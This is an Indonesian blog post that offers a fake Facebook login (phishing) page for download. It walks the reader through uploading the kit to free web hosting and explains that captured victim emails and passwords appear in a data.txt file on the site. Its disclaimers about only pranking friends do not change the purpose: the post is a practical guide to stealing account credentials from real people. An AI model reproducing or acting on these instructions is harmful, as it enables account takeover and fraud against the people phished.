Pages

Sponsor

Banner 468 x 60px

Minggu, 29 September 2013

phising

0 comments
Script Phising atau Fake Login Facebook - Phising adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi peka, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpecaya dalam sebuah komunikasi elektronik resmi, seperti ponsel atau pesan instan.

Phising yang akan saya bagian kali ini adalah Facebook, yang dimana phising ini sangat populer dan di cari-cari di facebook untuk mengelabui korbannya. Namun ingat gunakanlah phising ini dengan sebaik-baiknya dan semoga ini hanya dibuat sebagai pembelajaran saja atau iseng belaka kepada teman, sahabat, kaka.

Untuk mendownload phising facebook, silahkan klik disini
Dan kami ingatkan sekali lagi untuk tidak menyalah gunakan phising ini.

Lalu bagaimana cara menginstallnya ke hosting ??
Cara menginstallnya cukup mudah sekali hanya dengan beberapa kali klik saja.
1. Masuk ke Hosting anda, jika belum punya hosting anda bisa mendaftar di sini
2. Klik Kontrol Panel lalu klik kelola untuk di jadikan situs phising, jika anda belum mempunyai domain/situs silahkan klik "Create New Domain" dan pilih plan gratis dan ikuti langkah selanjutnya.
3. Terakhir kalian akan pergi ke sebuah dashboard/cpanel dan yang harus anda lakukan adalah tinggal mengupload saja script tadi saya berikan diatas pada "Import Website". Selesai!!

Situs Phising anda sudah jadi sekarang dan sebelum menengok ke situs phising anda, ada baiknya kalian melihat demonya disini.


Bagaimana Cara Melihat Email dan Password Korban?
Caranya anda cukup mengunjungi http://domain.com/data.txt.

Semoga artikel ini dapat membantu anda untuk membuat sebuah phising dan saya harapkan untuk tidak menyalah gunakan phising facebook ini, gunakanlah dengan sebaik-baiknya seperti hanya ingin mengerjain teman atau iseng kepada teman, sahabat, atau kakak.
Demikian artikel yang saya buat kali ini dan semoga bermanfaat buat kalian semua.

Teman-teman sedang membaca blog saya nihh phising dan teman-teman bisa menemukan puisi dan cerita cinta phising ini dengan url http://sharing-forum.blogspot.com/2013/09/phising.html, teman-teman bisa membacanya phising ini sangat bermanfaat bagi teman-teman, namun jangan lupa untuk meletakkan link phising sumbernya.

Related Post:

0 comments:

Posting Komentar